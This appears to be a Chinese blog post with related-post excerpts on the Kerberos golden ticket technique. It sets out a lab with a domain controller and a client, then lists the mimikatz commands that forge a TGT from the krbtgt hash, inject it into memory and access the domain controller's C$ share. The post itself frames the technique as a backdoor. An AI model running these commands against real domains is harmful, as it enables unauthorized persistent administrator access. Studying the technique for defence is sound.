域滲透之金票據學習

2021-09-20 04:24:47 字數 977 閱讀 6831

金票據(golden ticket):偽造票據授予票據(tgt),也被稱為認證票據。

krbtgt賬戶:每個域控制器都有乙個「krbtgt」的使用者賬戶,是kdc的服務賬戶,用來建立票據授予服務(tgs)加密的金鑰。

與其說是一種攻擊方式,不如說是一種後門,當域控許可權掉後,再重新獲取許可權。

環境域控2k3,ip:10.0.2.15

域內主機07,ip:10.0.2.16

kerberos :: golden:建立**

user:jiujiu99偽造的使用者

domain:jiu.com網域名稱

sid:id域中sid

krbtft:hash在域控中匯出的hash

ppt:將偽造的票據插入到記憶體中以供使用

其中也可以分步建立票據與匯入

kerberos::purge

kerberos::golden /admin:administrator /domain:域 /sid:sid /krbtgt:hash值 /ticket:adinistrator.kiribi

kerberos::ptt administrator.kiribi

kerberos::tgt

dir \jiu.com\c$

域滲透之金票據學習 md

金票據 golden ticket 偽造票據授予票據 tgt 也被稱為認證票據。krbtgt賬戶 每個域控制器都有乙個 krbtgt 的使用者賬戶,是kdc的服務賬戶,用來建立票據授予服務 tgs 加密的金鑰。與其說是一種攻擊方式,不如說是一種後門,當域控許可權掉後,再重新獲取許可權。環境域控2k3...

kerberos 票據 域滲透之黃金票據的實際利用

先介紹下kerberos協議 kerberos是一種由mit 麻省理工大學 提出的一種網路身份驗證協議。它旨在通過使用金鑰加密技術為客戶端 伺服器應用程式提供強身份驗證。在kerberos協議中主要是有三個角色的存在 1 訪問服務的client 使用者的機器客戶端 2 提供服務的server 服務端...

域滲透的金之鑰匙

mickey 2015 10 13 11 33 最近幾年很少搞內網滲透了,這幾年發展的快啊,看了a牛翻譯的 發現趨勢都是powershell指令碼化了。想當年遇到的域控都是windows 2003的,找朋友要些vbscript指令碼自動化,然後那啥那啥的。現在搞域除了前段時間出的ms14068,還有...